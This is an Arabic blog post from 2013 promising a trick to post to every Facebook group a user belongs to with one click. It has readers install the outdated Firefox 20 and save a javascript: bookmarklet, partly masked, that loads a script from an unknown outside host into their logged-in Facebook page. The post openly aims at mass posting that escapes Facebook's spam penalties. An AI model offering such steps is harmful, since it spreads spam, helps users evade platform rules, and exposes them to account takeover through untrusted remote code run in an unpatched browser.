الخميس، 19 ديسمبر 2013

كيف تنشر في عدة مجموعات على الفيسبوك بنقرة زر واحدة 2014

كيف تنشر في عدة مجموعات على الفيسبوك بنقرة زر واحدة 2014

قد توجد العديد من الحيل للنشر في عدة مجموعات على الفيسبوك دفعة واحدة ، لكن معضمها هو محضور من طرف الفيسبوك ، واغلبها قد يعرض حسابك لخطر الإقفال ، مدام ان فيسبوك تعتبر ذلك نوع من السبام الذي قد ينزل عقوبات على حسابك ، وعليه *تبقى من الطرق الاكثر أمان هي إستعمال اكواد الجاا سكريبت ، وذلك لسهولتها وسرعتها بالإضافة إلى انها لا تعرض حسابك للخطر كما هو الامر بالنسبة للـ Access Token *.







وعليه في موضوع هذه التدوينة ساقدم لك حيلة بسيطة يمكنك معها النشر في عدة مجموعات دون الخوف من تعرض حسابك للعقوبة . حيث يكفي ان تتوفر على الإصدار القديم من موزيلا فايرفوكس * Firefox 20 ويمكنك تحميله من الرابط اسفل اليديو ، وكذلك ان تتوفر على الكود الاتي :



java******:(function(){********.body.appendChild(* *******.createElement('******')).src='http://yourjava******.com/01351321011/s.js';})();



والذي سيمكنك من النشر في عدة مجموعات على الفيسبوك مهما بلغ عددها !



الطريقة الولى تمثل في تتبيث برنامج موزيلا فايرفوكس الإصدار الــ 20 تم بعد ذلك قم بإضافة مفضلة جديدة Bookmark إلى المتصفح ،





في إسم المفضلة إختر gppost اما في location فضع كود الجااسكريبت الذي حددته في اول التدوينة ، بعد ذلك انقر على ok



http://3.bp.blogspot.com/-6W9LhjMbGN...Js/s1600/s.png



الان قم بالدخول إلى حسابك في فيسبوك وانقر على المفضلة التي اضفتها بعد ذلك ستضهر خانة صغيرة انشر فيها ماشئت رابط موقعك او رسالة وسيتم نشرها في جميع مجموعات الفيسبوك المشترك بها ! حظ موفق :)



تحميل فايرفوكس الاصدار 20

ليست هناك تعليقات:

إرسال تعليق